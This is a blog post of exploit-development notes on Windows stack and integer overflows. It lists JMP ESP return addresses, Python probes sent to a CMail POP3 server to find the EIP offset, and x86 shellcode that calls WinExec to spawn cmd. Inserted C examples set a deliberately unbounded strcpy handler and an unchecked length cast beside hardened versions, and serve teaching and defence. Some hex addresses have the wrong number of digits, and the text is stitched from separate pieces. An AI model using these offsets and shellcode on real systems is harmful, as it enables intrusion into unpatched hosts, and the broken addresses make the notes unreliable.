Wednesday, December 16, 2009

Stack and Integer Overflow

Stack Overflow

- Common addresses for XP, 2000 and 2003: JMP EBX at 0x7ffa1571 and 0x7ffa4a1, JMP ESP at 0x7ffa4512

- Sometimes the shellcode cannot directly follow the jmp esp, e.g. in the MS03-049 Workstation Service overflow and the MS03-026 RPC overflow. Sometimes a gap is needed there, maybe 8 bytes, so when testing the layout should be

jmp esp ---> testing code ( eg, eb fe ) ---> shellcode

Solutions:
1. Place the shellcode in front of the return address

SHELLCODE | AAAAAAAAAA... | JMP ESP | AAAAAAAA..... |

2. Add some junk code in the gap

- To check whether a host is running the vulnerable application, analyse its network traffic: the patched version usually responds differently from the unpatched one.

- To locate the overflow point, here is the Python code (for CMail):

#1 - five 100-byte markers: the value that lands in EIP tells which block holds the overflow point
import poplib
m = poplib.POP3('127.0.0.1')
s = 'a' * 100 + 'b' * 100 + 'c' * 100 + 'd' * 100 + 'e' * 100
m.user(s)

#2 - 400 bytes of padding, then 10-byte markers to narrow the offset inside the block found above
import poplib
m = poplib.POP3('127.0.0.1')
s = 'a' * 400 + 'a' * 10 + 'b' * 10 + 'c' * 10 + 'd' * 10 + 'e' * 10 + 'f' * 10 + 'g' * 10 + 'h' * 10 + 'i' * 10 + 'j' * 10
m.user(s)
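The probe above works because the server copies the USER argument into a fixed-size stack buffer without checking its length. The following C example, added here and not part of the original post or of CMail, shows that defect beside the bounded version a server should use; the buffer size USERNAME_MAX, the function names and the marker builder are constructed for the example.

```c
#include <stdio.h>
#include <string.h>

#define USERNAME_MAX 64   /* constructed limit for the example */

/* Vulnerable pattern: the argument of "USER <name>" is copied into a
 * fixed-size stack buffer with no length check. The 500-byte marker
 * string from the probe would overwrite the saved return address.
 * Only called with short input in this example. */
int handle_user_unchecked(const char *line)
{
    char name[USERNAME_MAX];
    if (strncmp(line, "USER ", 5) != 0)
        return -1;
    strcpy(name, line + 5);           /* unbounded copy: the defect */
    return (int)strlen(name);
}

/* Hardened version: the argument ends at CRLF and is measured before it
 * is copied. Returns 0 on success, -1 for a malformed command and -2
 * when the argument does not fit in the caller's buffer. */
int handle_user_checked(const char *line, char *out, size_t outsz)
{
    if (strncmp(line, "USER ", 5) != 0)
        return -1;
    const char *arg = line + 5;
    size_t n = strcspn(arg, "\r\n");
    if (n >= outsz)
        return -2;
    memcpy(out, arg, n);
    out[n] = '\0';
    return 0;
}

/* Builds the same 500-byte marker pattern as probe #1 (100 'a', 100 'b',
 * ... 100 'e') as a complete "USER ...\r\n" line so the rejection can be
 * exercised offline. Returns the line length, or 0 if buf is too small. */
size_t build_marker(char *buf, size_t bufsz)
{
    size_t pos = 0;
    if (bufsz < 5 + 500 + 3)
        return 0;
    memcpy(buf, "USER ", 5);
    pos = 5;
    for (char c = 'a'; c <= 'e'; c++) {
        memset(buf + pos, c, 100);
        pos += 100;
    }
    memcpy(buf + pos, "\r\n", 3);     /* copies the terminator as well */
    return pos + 2;
}

int main(void)
{
    char line[600], out[USERNAME_MAX];
    size_t len = build_marker(line, sizeof line);
    printf("marker line: %zu bytes, checked handler -> %d\n",
           len, handle_user_checked(line, out, sizeof out));
    printf("short line, checked handler -> %d (%s)\n",
           handle_user_checked("USER alice\r\n", out, sizeof out), out);
    return 0;
}
```

The checked handler rejects the marker line with -2 before any copy happens, which is the behaviour a patched server would show and the reason the traffic of a patched build looks different from an unpatched one.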

- To open a command prompt

push ebp
mov ebp, esp
push ebx // reserve 4 bytes at [ebp-4] for the string (ebx itself is not preserved)
mov byte ptr [ebp-4], 63h //'c'
mov byte ptr [ebp-3], 6Dh //'m'
mov byte ptr [ebp-2], 64h //'d'
mov byte ptr [ebp-1], 0 //'\0'

push 5 // uCmdShow = SW_SHOW (#define SW_SHOW 5)
lea eax, [ebp-4] // lpCmdLine -> "cmd"
push eax
mov eax, 0x777e4fd35 // address of WinExec as written in the post; it depends on the kernel32.dll build
call eax // WinExec is stdcall, so it removes its own two arguments
mov esp, ebp // discard the 4-byte slot and restore the frame
pop ebp


#include <windows.h>

int main(void)
{
    char cmdline[4] = "cmd";
    WinExec(cmdline, SW_SHOW);
    return 0;
}



Integer Overflow

- The input could be a negative value. When it is assigned to an unsigned variable, -1 becomes 0xffffffff. This can trigger an overflow by making the program request a huge heap area.

- Usually this type of overflow is harder to exploit than a plain stack or heap overflow.

- Examples: JPEG integer overflow, Windows USER32 LoadImage API integer overflow, PuTTY SFTP client integer overflow, Evolution camel-lock-helper integer overflow
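The signed-to-unsigned conversion described above, worked through in C as an added example that is not from the original post or any of the listed products: a length field read from untrusted input is widened to the allocation size, and the hardened version rejects it before any arithmetic happens. The limit MAX_RECORD and the function names are constructed for the example; 32-bit types are used so the wrap-around is the same on any host.

```c
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>

#define MAX_RECORD 0x10000u   /* constructed sanity limit for one record */

/* Unchecked pattern: the signed length from the input is widened to the
 * unsigned allocation size. -1 becomes 0xffffffff and "len + 1" wraps
 * to 0, so the allocation is tiny; -2 gives 0xffffffff, the huge heap
 * request the post mentions. Returns the size that would be requested. */
uint32_t alloc_size_unchecked(int32_t len)
{
    return (uint32_t)len + 1u;    /* unsigned wrap is well defined in C */
}

/* Copy length the same unchecked code would later pass to memcpy. */
uint32_t copy_len_unchecked(int32_t len)
{
    return (uint32_t)len;         /* -1 -> 0xffffffff */
}

/* True when the unchecked arithmetic makes the copy larger than the
 * buffer it was allocated for this length. */
bool unchecked_overflows(int32_t len)
{
    return copy_len_unchecked(len) >= alloc_size_unchecked(len);
}

/* Hardened version: reject negative lengths and cap against a sane
 * maximum. Because len <= MAX_RECORD, the +1 can no longer wrap.
 * Returns false if the length is rejected, otherwise stores the size. */
bool alloc_size_checked(int32_t len, uint32_t *out)
{
    if (len < 0)
        return false;
    if ((uint32_t)len > MAX_RECORD)
        return false;
    *out = (uint32_t)len + 1u;
    return true;
}

int main(void)
{
    int32_t samples[] = { 16, -1, -2, 0x20000 };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        uint32_t sz = 0;
        int32_t len = samples[i];
        printf("len=%d unchecked alloc=0x%x copy=0x%x overflow=%d checked=%s\n",
               len, alloc_size_unchecked(len), copy_len_unchecked(len),
               unchecked_overflows(len),
               alloc_size_checked(len, &sz) ? "accepted" : "rejected");
    }
    return 0;
}
```

Checking the sign and the range on the original signed value, before it is ever cast, is the whole fix: once the value has been widened to unsigned the information that it was negative is gone.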
